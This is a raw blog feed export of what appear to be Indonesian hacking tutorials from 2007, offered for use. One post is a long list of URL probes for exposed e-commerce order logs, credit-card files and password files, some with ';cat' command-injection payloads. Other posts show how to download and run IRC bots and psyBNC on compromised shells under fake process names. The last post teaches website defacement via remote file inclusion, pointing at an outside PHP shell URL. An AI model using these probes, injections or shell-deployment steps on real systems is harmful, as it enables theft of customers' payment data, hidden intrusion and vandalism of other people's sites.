/&gt;/shopadmin.asp&lt;br /&gt;/news_2003-02-27.htm&lt;br /&gt;/cgi-bin/whois.cgi&lt;br /&gt;3 /cgi-bin/calendar.pl&lt;br /&gt;3 /cgi-bin/calendar/calendar.pl&lt;br /&gt;3 /cgibin/styles.css&lt;br /&gt;3 /venem.htm&lt;br /&gt;2 /stats/www.newbauersflowers.com/stats/04-refers.htm&lt;br /&gt;2 /cgi-bin/where.pl&lt;br /&gt;2 /cgibin/shopper.cgi&amp;TEMPLATE=ORDER.LOG&lt;br /&gt;2 /cgibin/recon.cgi&lt;br /&gt;2 /cgibin/test.cgi&lt;br /&gt;2 /WebShop/templates/styles.css&lt;br /&gt;2 /stats/shopping350.mdb&lt;br /&gt;2 /cgi-bin/mailform.cgi&lt;br /&gt;2 /cgi-bin/recon.cgi&lt;br /&gt;2 /chevy&lt;br /&gt;2 /cgi-bin/servinfo.cgi&lt;br /&gt;2 /acart2_0.mdb&lt;br /&gt;2 /cgi-bin/where.cgi&lt;br /&gt;2 /chevy/&lt;br /&gt;2 /stats/www.savethemall.net/stats/19-refers.htm&lt;br /&gt;2 /ccbill/secure/ccbill.log&lt;br /&gt;2 /cgi/recon.cgi&lt;br /&gt;2 /stats/www.gregoryflynn.com/chevy&lt;br /&gt;2 /ibill/glocation.cgi&lt;br /&gt;2 /ccbill/whereami.cgi&lt;br /&gt;2 /ibill/whereami.cgi&lt;br /&gt;2 /apps_trial.htm&lt;br /&gt;2 /cgi-bin/lancelot/recon.cgi&lt;br /&gt;2 /cgi-bin/DCShop/Orders/styles.css&lt;br /&gt;1 /cgi-bin/htmanage.cgi&lt;br /&gt;1 /stats/www.tysons.net/stats/05-refers.htm&lt;br /&gt;1 /cgi-bin/mastergate/add.cgi&lt;br /&gt;1 /cgi-bin/openjournal.cgi&lt;br /&gt;1 /cgi-bin/calendar/calendar_admin.pl&lt;br /&gt;1 /cgibin/ibill/count.cgi&lt;br /&gt;1 /cgi-bin/nbmember2.cgi&lt;br /&gt;1 /cgi-bin/mastergate/count.cgi&lt;br /&gt;1 /cgi-bin/mastergate/accountcreate.cgi&lt;br /&gt;1 /cgi-bin/ibill/accountcreate.cgi&lt;br /&gt;1 /cgibin/MasterGate2/count.cgi&lt;br /&gt;1 /cgi-bin/amadmin.pl&lt;br /&gt;1 /cgibin/mailform.cgi&lt;br /&gt;1 /cgibin/mastergate/count.cgi&lt;br /&gt;1 /cgibin/harvestor.cgi&lt;br /&gt;1 /cgibin/igate/count.cgi&lt;br /&gt;1 /WebShop&lt;br /&gt;1 /shopdisplaycategories.asp&lt;br /&gt;1 /cgi-bin/DCShop/Orders/orders.txt&lt;br /&gt;1 /cgi-bill/revshare/joinpage.cgi&lt;br /&gt;1 /stats/www.gregoryflynn.com/stats/19-refers.htm&lt;br /&gt;1 /cgi-local/DCShop/auth_data/styles.css&lt;br /&gt;1 /cgi-bin/add-passwd.cgi&lt;br /&gt;1 /cgi-bin/MasterGate/count.cgi&lt;br /&gt;1 /apps_shop.htm%20/comersus/database/comersus.mdb&lt;br /&gt;1 /data/verotellog.txt&lt;br /&gt;1 /epwd/ws_ftp.log&lt;br /&gt;1 /stats/www.dialacure.com/stats/16-refers.htm&lt;br /&gt;1 /cgi/MasterGate2/count.cgi&lt;br /&gt;1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019&lt;br /&gt;1 /wwii/styles.css&lt;br /&gt;1 /cgi-bin/admin.mdb&lt;br /&gt;1 /stats/www.gregoryflynn.com/stats/31-refers.htm&lt;br /&gt;1 /cgi-bin/ibill-tools/count.cgi&lt;br /&gt;1 /WebShop/templates/cc.txt&lt;br /&gt;1 /cgibin/ibill/accountcreate.cgi&lt;br /&gt;1 /cgi-bin/count.cgi&lt;br /&gt;1 /cgi-local/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;1 /cgi/mastergate/count.cgi&lt;br /&gt;1 /cgi-bin/EuroDebit/addusr.pl&lt;br /&gt;1 /cgi-bin/dbm-passwd.cgi&lt;br /&gt;1 /cgi/igate/accountcreate.cgi&lt;br /&gt;1 /cgi-bin/store/Log_files/your_order.log&lt;br /&gt;store/log_files/your_order.log&lt;br /&gt;/cgi-bin/DCShop/Orders/orders.txt&lt;br /&gt;/vpasp/shopdbtest.asp&lt;br /&gt;/orders/checks.txt&lt;br /&gt;/WebShop/logs&lt;br /&gt;/ccbill/secure/ccbill.log&lt;br /&gt;/scripts/cart32.exe&lt;br /&gt;/cvv2.txt&lt;br /&gt;/cart/shopdbtest.asp&lt;br /&gt;/cgi-win/cart.pl&lt;br /&gt;/shopdbtest.asp&lt;br /&gt;/WebShop/logs/cc.txt&lt;br /&gt;/cgi-local/cart.pl&lt;br /&gt;/PDG_Cart/order.log&lt;br /&gt;/config/datasources/expire.mdb&lt;br /&gt;/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml&lt;br /&gt;/orders/orders.txt&lt;br /&gt;/cgis/cart.pl&lt;br /&gt;/webcart/carts&lt;br /&gt;/cgi-bin/cart32.exe/cart32clientlist&lt;br /&gt;/cgi/cart.pl&lt;br /&gt;/comersus/database/comersus.mdb&lt;br /&gt;/WebShop/templates/cc.txt&lt;br /&gt;/Admin_files/order.log&lt;br /&gt;/orders/mountain.cfg&lt;br /&gt;/cgi-sys/cart.pl&lt;br /&gt;/scripts/cart.pl&lt;br /&gt;/htbin/cart.pl&lt;br /&gt;/productcart/database/EIPC.mdb&lt;br /&gt;/shoponline/fpdb/shop.mdb&lt;br /&gt;/config/datasources/myorder.mdb&lt;br /&gt;/PDG_Cart/shopper.conf&lt;br /&gt;/shopping/database/metacart.mdb&lt;br /&gt;/bin/cart.pl&lt;br /&gt;/cgi-bin/cart32.ini&lt;br /&gt;/database/comersus.mdb&lt;br /&gt;/cgi-local/medstore/loadpage.cgi?user_id=id&amp;file=data/orders.txt&lt;br /&gt;/cgi-bin/store/Admin_files/myorderlog.txt&lt;br /&gt;/cgi-bin/orders.txt&lt;br /&gt;/cgi-bin/store/Admin_files/your_order.log&lt;br /&gt;/test/test.txt&lt;br /&gt;/fpdb/shop.mdb&lt;br /&gt;/cgibin/shop/orders/orders.txt&lt;br /&gt;/shopadmin1.asp&lt;br /&gt;/cgi-bin/shop.cgi&lt;br /&gt;/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi&lt;br /&gt;/cgi-bin/PDG_cart/card.txt&lt;br /&gt;/shopper.cgi?preadd=action&amp;key=PROFA&amp;template=order1.log&lt;br /&gt;/store/shopdbtest.asp&lt;br /&gt;/log_files/your_order.log&lt;br /&gt;/_database/expire.mdb&lt;br /&gt;/HyperStat/stat_what.log&lt;br /&gt;/cgibin/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/htbin/orders/orders.txt&lt;br /&gt;/SHOP/shopadmin.asp&lt;br /&gt;/index.cgi?page=../admin/files/order.log&lt;br /&gt;/vpshop/shopadmin.asp&lt;br /&gt;/webcart/config&lt;br /&gt;/PDG/order.txt&lt;br /&gt;/cgi-bin/shopper.cgi&lt;br /&gt;/orders/order.log&lt;br /&gt;/orders/db/zzzbizorders.log.html&lt;br /&gt;/easylog/easylog.html&lt;br /&gt;/cgi-bin/store/Log_files/your_order.log&lt;br /&gt;/cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=shopping400.mdb&lt;br /&gt;/comersus_message.asp?&lt;br /&gt;/orders/import.txt&lt;br /&gt;/htbin/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/admin/html_lib.pl&lt;br /&gt;/cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=myorder.txt&lt;br /&gt;/cgi-bin/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-bin/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgi-bin/shopper?search=action&amp;keywords=dhenzuser%20&amp;template=order.log&lt;br /&gt;/HBill/htpasswd&lt;br /&gt;/bin/shop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-bin/cs/shopdbtest.asp&lt;br /&gt;/mysql/shopping.mdb&lt;br /&gt;/Catalog/config/datasources/Products.mdb&lt;br /&gt;/trafficlog&lt;br /&gt;/cgi/orders/orders.txt&lt;br /&gt;/cgi-local/PDG_Cart/shopper.conf&lt;br /&gt;/store/cgi-bin/Admin_files/expire.mdb&lt;br /&gt;/derbyteccgi/shopper.cgi?key=SC7021&amp;preadd=action&amp;template=order.log&lt;br /&gt;/derbyteccgi/shopper.cgi?search=action&amp;keywords=moron&amp;template=order.log&lt;br /&gt;/cgi-bin/mc.txt&lt;br /&gt;/cgi-bin/mall2000.cgi&lt;br /&gt;/cgi-win/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-bin/shopper.cgi?search=action&amp;keywords=root%20&amp;template=order.log&lt;br /&gt;/store/commerce.cgi&lt;br /&gt;/scripts/shop/orders/orders.txt&lt;br /&gt;/product/shopping350.mdb&lt;br /&gt;/super_stats/access_logs&lt;br /&gt;/cgi-local/orders/orders.txt&lt;br /&gt;/cgi-bin/PDG_Cart/mc.txt&lt;br /&gt;/cgibin/cart32.exe&lt;br /&gt;/cgi-bin/Shopper.exe?search=action&amp;keywords=psiber%20&amp;template=other/risinglogorder.log&lt;br /&gt;/cgibin/password.txt&lt;br /&gt;/Catalog/cart/carttrial.dat&lt;br /&gt;/catalog/Admin/Admin.asp&lt;br /&gt;/ecommerce/admin/user/admin.asp&lt;br /&gt;/data/productcart/database/EIPC.mdb&lt;br /&gt;/store/admin_files/commerce_user_lib.pl&lt;br /&gt;/cgi-bin/store/index.cgi&lt;br /&gt;/paynet.txt&lt;br /&gt;/config/datasources/store/billing.mdb&lt;br /&gt;/_database/shopping350.mdb&lt;br /&gt;/cgi-bin/shopper.exe?search&lt;br /&gt;/cgi/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgi-bin/store/Admin_files/orders.txt&lt;br /&gt;/cgi-bin/store/commerce_user_lib.pl&lt;br /&gt;/cgi-sys/pagelog.cgi&lt;br /&gt;/cgi-sys/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/scripts/weblog&lt;br /&gt;/fpdb/shopping400.mdb&lt;br /&gt;/htbin/shop/orders/orders.txt&lt;br /&gt;/cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=myorder.log&lt;br /&gt;/cgi-bin/shopper.exe?search=action&amp;keywords=psiber&amp;template=order.log&lt;br /&gt;/mall_log_files/&lt;br /&gt;/cgi-bin/perlshop.cgi&lt;br /&gt;/tienda/shopdbtest.asp&lt;br /&gt;/cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=shopping.mdb&lt;br /&gt;/cgi-bin/shopper.cgi?search=action&amp;keywords=whinhall&amp;template=order.log&lt;br /&gt;/WebShop/logs/ck.log&lt;br /&gt;/fpdb/shopping300.mdb&lt;br /&gt;/mysql/store.mdb&lt;br /&gt;/cgi-bin/store/Admin_files/commerce_user_lib.pl&lt;br /&gt;/config.dat&lt;br /&gt;/order/order.log&lt;br /&gt;/commerce_user_lib.pl&lt;br /&gt;/Admin_files/AuthorizeNet_user_lib.pl&lt;br /&gt;/cvv2.asp&lt;br /&gt;/cgi-bin/cart32/CART32-order.txt&lt;br /&gt;/wwwlog&lt;br /&gt;/cool-logs/mlog.html&lt;br /&gt;/cgi-bin/pass/merchant.cgi.log&lt;br /&gt;/cgi-local/pagelog.cgi&lt;br /&gt;/cgi-bin/pagelog.cgi&lt;br /&gt;/cgi-bin/orders/cc.txt&lt;br /&gt;/cgis/shop/orders/orders.txt&lt;br /&gt;/admin/admin_conf.pl&lt;br /&gt;/cgi-bin/pdg_cart/order.log&lt;br /&gt;/cgi/PDG_Cart/order.log&lt;br /&gt;/Admin_files/ccelog.txt&lt;br /&gt;/cgi-bin/orders/mc.txt&lt;br /&gt;/cgi/cart32.exe&lt;br /&gt;/ecommerce/admin/admin.asp&lt;br /&gt;/scripts/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/Catalog/config/datasources/Expire.mdb&lt;br /&gt;/ecommerce/admin/shopdbtest.asp&lt;br /&gt;/mysql/mystore.mdb&lt;br /&gt;/cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=shopping.asp&lt;br /&gt;/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log&lt;br /&gt;/cgi-bin/Count.cgi?df=callcard.dat&lt;br /&gt;/logfiles/&lt;br /&gt;/shopping/shopping350.mdb&lt;br /&gt;/admin/configuration.pl&lt;br /&gt;/cgis/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgis/cart32.exe&lt;br /&gt;/cgi-bin/dcshop.cgi&lt;br /&gt;/cgi-win/shop/auth_data/auth_user_file.txt&lt;br /&gt;/shopping400.mdb&lt;br /&gt;/HBill/config&lt;br /&gt;/cgi-bin/shop/index.cgi?page=../admin/files/order.log&lt;br /&gt;/search=action&amp;keywords=GSD%20&amp;template=order.log&lt;br /&gt;/WebCart/orders.txt&lt;br /&gt;/PDG_Cart/authorizenets.txt&lt;br /&gt;/cgi-bin/AnyForm2&lt;br /&gt;/~gcw/cgi-bin/Count.cgi?df=callcard.dat&lt;br /&gt;/cgi-bin/PDG_Cart/order.log&lt;br /&gt;/expire.mdb&lt;br /&gt;/logger/&lt;br /&gt;/webcart-lite/orders/import.txt&lt;br /&gt;/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl&lt;br /&gt;/cgi-bin/PDG_Cart/shopper.conf&lt;br /&gt;/cgi-bin/cart32.exe&lt;br /&gt;/dc/orders/orders.txt&lt;br /&gt;/cgi-local/DCShop/orders/orders.txt&lt;br /&gt;/shop.pl/page=shop.cfg&lt;br /&gt;/cgi-local/cart32.exe&lt;br /&gt;/cgi-win/pagelog.cgi&lt;br /&gt;/cgi-win/shop/orders/orders.txt&lt;br /&gt;/cgibin/shopper.cgi?search=action&amp;keywords=moron&amp;template=order.csv&lt;br /&gt;/cgi-sys/DCShop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-bin/www-sql;;;&lt;br /&gt;/cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=order.log&lt;br /&gt;/scripts/orders/orders.txt&lt;br /&gt;/cgi-local/shop.pl/shop.cfg&lt;br /&gt;/search=action&amp;keywords=cwtb%20&amp;template=expire.mdb&lt;br /&gt;/php/mylog.phtml&lt;br /&gt;/config/datasources/shopping.mdb&lt;br /&gt;/php-coolfile/action.php?action=edit&amp;file=config.php&lt;br /&gt;/cgi-bin/ezmall2000/mall2000.cgi&lt;br /&gt;/cgi/DCShop/orders/orders.txt&lt;br /&gt;/cgi-local/shop.pl&lt;br /&gt;/cgis/DCShop/orders/orders.txt&lt;br /&gt;/product/shopdbtest.asp&lt;br /&gt;/ASP/cart/database/metacart.mdb&lt;br /&gt;/cgi-bin/cgi-lib.pl&lt;br /&gt;/cgi-bin/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html&lt;br /&gt;/search=action&amp;keywords=cwtb%20&amp;template=order.log&lt;br /&gt;/mysql/expire.mdb&lt;br /&gt;/scripts/shop/auth_data/auth_user_file.txt&lt;br /&gt;/cgi-bin/cart32/whatever-OUTPUT.txt&lt;br /&gt;/Shopping%20Cart/shopdbtest.asp&lt;br /&gt;/cgi/shop/auth_data/auth_user_file.txt&lt;br /&gt;/shop/shopping350.mdb&lt;br /&gt;/cgi-bin/store/Authorize_Net.pl&lt;br /&gt;/scripts/DCShop/orders/orders.txt&lt;br /&gt;/store/log_files/commerce_user_lib.pl&lt;br /&gt;/shopping/shopadmin.asp&lt;br /&gt;/cgi-bin/orderlog.txt&lt;br /&gt;/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&amp;CHANGE=YES&amp;amp;amp;NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&amp;CODE=PHOLD;;;&lt;br /&gt;/cool-logs/mylog.html&lt;br /&gt;/cgibin/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/htbin/shop.pl/page=;cat%20shop.pl&lt;br /&gt;/cgi-win/orders/orders.txt&lt;br /&gt;/cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=order1.txt&lt;br /&gt;/SHOP/shopdbtest.asp&lt;br /&gt;/cgi/pagelog.cgi&lt;br /&gt;/php/mlog.phtml&lt;br /&gt;/cgi-bin/shop/apdproducts.mdb&lt;br /&gt;/htbin/shop/auth_data/auth_user_file.txt&lt;br /&gt;/server%20logfile;;;&lt;br /&gt;/database/metacart.mdb&lt;br /&gt;/cgi-local/shop/orders/orders.txt&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-3769429085610844870?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/3769429085610844870'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/3769429085610844870'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/hacking-google.html' title='hacking google'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-8227196135465696836</id><published>2007-09-27T16:19:00.000+07:00</published><updated>2007-09-27T16:20:55.485+07:00</updated><title type='text'>Cara Mudah Untuk membuat BOT</title><content type='html'>Cara Pertama:&lt;br /&gt;&lt;br /&gt;NB: BOT Ini akan otomatis jalan pada server dalnet " khusus Untuk dalnet server "&lt;br /&gt;1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz&lt;br /&gt;atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 &lt;--untuk tambahan creat.tcl&lt;br /&gt;2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz&lt;br /&gt;tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2&lt;br /&gt;3. cd .kin&lt;br /&gt;4. ./creat fileconf nick ident IP channel owner&lt;br /&gt;&lt;br /&gt;contoh: ./creat defaced Mr_Lam3r 212.88.174.3 defaced dr_zig&lt;br /&gt;defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya)&lt;br /&gt;Mr_Lam3r ...............nick bot&lt;br /&gt;dr_zig ...................ident bot&lt;br /&gt;212.88.174.3 .......IP shell &lt;bisa dilihat dengan menggunakan command /sbin/ifconfig atau cat /etc/hosts&lt;br /&gt;defaced ..................... nama channel, jangan pake #&lt;br /&gt;dr_zig ................ nick owner&lt;br /&gt;&lt;br /&gt;catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash)&lt;br /&gt;contoh: mich`keren -&gt; mich\`keren&lt;br /&gt;&lt;br /&gt;5. ./eggdrop -m fileconf&lt;br /&gt;atau ./run fileconf fakename&lt;br /&gt;fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat&lt;br /&gt;&lt;br /&gt;contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)&lt;br /&gt;Udah deh! tunggu aja di channel, ato whois aja nicknya.&lt;br /&gt;Bila ingin tambahkan tcl lain seperti creat.tcl &lt;khusus pada kinabot.tar.bz2&gt;:&lt;br /&gt;&lt;br /&gt;2. ./tcl -t fileconf creat.tcl&lt;br /&gt;contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )&lt;br /&gt;untuk penggunaan bisa diliat dengan command/perintah !creat dichannel&lt;br /&gt;&lt;br /&gt;Cara Kedua:&lt;br /&gt;&lt;br /&gt;wget http://geocities.com/g4ptek/tools/bot.tar.gz&lt;br /&gt;tar -zxvf bot.tar.gz&lt;br /&gt;rm -rf bot.tar.gz&lt;br /&gt;cd .share&lt;br /&gt;# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi&lt;br /&gt;# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt&lt;br /&gt;# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/&lt;br /&gt;# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi&lt;br /&gt;./shade "httpd" ./eggdrop -m bot.txt&lt;br /&gt;# usage:&lt;br /&gt;# pv bot kamu di channel&lt;br /&gt;# /msg nick-bot-kamu auth &lt;passwd&gt;&lt;br /&gt;# /msg nick-bot-kamu pass &lt;passwd&gt;&lt;br /&gt;# /msg nick-bot-kamu auth &lt;passwd&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-8227196135465696836?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8227196135465696836'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8227196135465696836'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/cara-mudah-untuk-membuat-bot.html' title='Cara Mudah Untuk membuat BOT'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-1245149552491665248</id><published>2007-09-27T16:16:00.000+07:00</published><updated>2007-09-27T16:17:54.153+07:00</updated><title type='text'>Cara Praktis membuat bot dan psyBNC di dalnet</title><content type='html'>untuk dapat membuat bot dan psybNC, kamu harus punya shell yang bagus&lt;br /&gt;lebih bagus lagi kamu pegang akses root....&lt;br /&gt;&lt;br /&gt;klu kamu belum punya shell yang bagus dapet di ambil di&lt;br /&gt;&lt;br /&gt;http://www.manadocoding.com/forum/viewtopic.php?t=1627&lt;br /&gt;&lt;br /&gt;ok sekaran kita mulai caranya ...&lt;br /&gt;&lt;br /&gt;==========================&lt;br /&gt;command2 Dasar server Linux dan FreebSD:&lt;br /&gt;1. uname -a;id &lt;&lt;== untuk melihat jenis server dan id&lt;br /&gt;2. /sbin/ifconfig | grep inet&lt;&lt;== untuk melihat ip server&lt;br /&gt;3. find / -type d -perm 777 &lt;&lt;== untuk melihat direktori yg tidak permission denied&lt;br /&gt;4. mkdir &lt;&lt;== untuk membuat direktori baru example: mkdir love&lt;br /&gt;5. ls -alF &lt;&lt;== untuk melihat semua file dalam sebuah direktory&lt;br /&gt;6. wget/lwp-download/curl -f -O &lt;&lt;== untuk mendownload file kita kedalam server&lt;br /&gt;&lt;br /&gt;cara membuat bot dari server Linux:&lt;br /&gt;1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/acz.tgz&lt;br /&gt;2. cd /var/tmp;tar -zxvf acz.tgz&lt;br /&gt;3. cd /var/tmp;rm -fr acz.tgz&lt;br /&gt;4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)&lt;br /&gt;5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt&lt;br /&gt;&lt;br /&gt;cara membuat bot dari server FreeBsd:&lt;br /&gt;1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz&lt;br /&gt;2. cd /var/tmp;tar -zxvf aczbsd.tgz&lt;br /&gt;3. cd /var/tmp;rm -fr acz.tgz&lt;br /&gt;4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)&lt;br /&gt;5. cd /var/tmp/.sh;./eggdop -m a.txt&lt;br /&gt;&lt;br /&gt;cara load psy dari server Linux:&lt;br /&gt;1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz&lt;br /&gt;2. cd /var/tmp;tar -zxvf AhoK.tar.gz&lt;br /&gt;3. cd /var/tmp;rm -fr AhoK.tar.gz&lt;br /&gt;4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)&lt;br /&gt;5. cd /var/tmp/AhoK;./f**k&lt;br /&gt;6. cd /var/tmp/AhoK;./run&lt;br /&gt;kalau uda dirun coba join ke #samudra lalu test portcheck.. example `pc (nomerIP) (PORT)&lt;br /&gt;&lt;br /&gt;cara load psy dari server FreeBsd:&lt;br /&gt;&lt;br /&gt;1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz&lt;br /&gt;2. cd /var/tmp;tar zxfv samsengpsy.tgz&lt;br /&gt;3. cd /var/tmp;rm -fr samsengpsy.tgz&lt;br /&gt;4. cd /var/tmp/samseng;./config (IDENTD) (PORT)&lt;br /&gt;5. cd /var/tmp/samseng;./f**k&lt;br /&gt;6. cd /var/tmp/samseng;./run&lt;br /&gt;&lt;br /&gt;bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server Linux&lt;br /&gt;1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufi.tar.gz&lt;br /&gt;2. cd /var/tmp;tar -zxvf Gufi.tar.gz&lt;br /&gt;3. cd /var/tmp rm -fr Gufi.tar.gz&lt;br /&gt;4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)&lt;br /&gt;5. cd /var/tmp/.sh;./eggdrop -m a.txt&lt;br /&gt;kalau uda masuk botnya coba test !dns [host] | !ip2c &lt;nick&gt;&lt;host&gt; | `pc [host] [port] | !jodoh&lt;br /&gt;&lt;br /&gt;bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server FreeBsd&lt;br /&gt;1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufibsd.tar.gz&lt;br /&gt;2. cd /var/tmp;tar -zxvf Gufibsd.tar.gz&lt;br /&gt;3. cd /var/tmp rm -fr Gufibsd.tar.gz&lt;br /&gt;4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)&lt;br /&gt;5. cd /var/tmp/.sh;./eggdrop -m a.txt&lt;br /&gt;kalau uda masuk botnya coba test !dns [host] | !ip2c &lt;nick&gt;&lt;host&gt; | `pc [host] [port] | !jodoh&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sedikit saran&lt;br /&gt;klu mau buat bot dan psyBNC, jangan terlalu banyak buatnya&lt;br /&gt;dalam 1 shell injeck, soalnya nanti di kill ama dalnet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-1245149552491665248?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/1245149552491665248'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/1245149552491665248'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/cara-praktis-membuat-bot-dan-psybnc-di.html' title='Cara Praktis membuat bot dan psyBNC di dalnet'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-2539185959229727193</id><published>2007-09-27T10:18:00.000+07:00</published><updated>2007-09-27T16:08:48.349+07:00</updated><title type='text'>CARA DEFACE</title><content type='html'>Ini ada tutorial Cara deface yg nyaman (tgl copy-paste santai to?):&lt;br /&gt;&lt;br /&gt;1. Buka www.milw0rm.com&lt;br /&gt;2. klik Search&lt;br /&gt;3. ketik RFI (Remote File Inclusion)&lt;br /&gt;4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal&lt;br /&gt;5. Buka Google, dan liat Advisor yang kita pilih tersebut&lt;br /&gt;6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut&lt;br /&gt;7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]&lt;br /&gt;8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya&lt;br /&gt;9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor&lt;br /&gt;10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.&lt;br /&gt;11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain&lt;br /&gt;12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,&lt;br /&gt;13. Ganti command exploit setelah tanda '='[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]&lt;br /&gt;14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion&lt;br /&gt;15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw &lt;-- untuk file | drwxrwxrwx / drw-rw-rw &lt;-- untuk direktory&lt;br /&gt;16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah 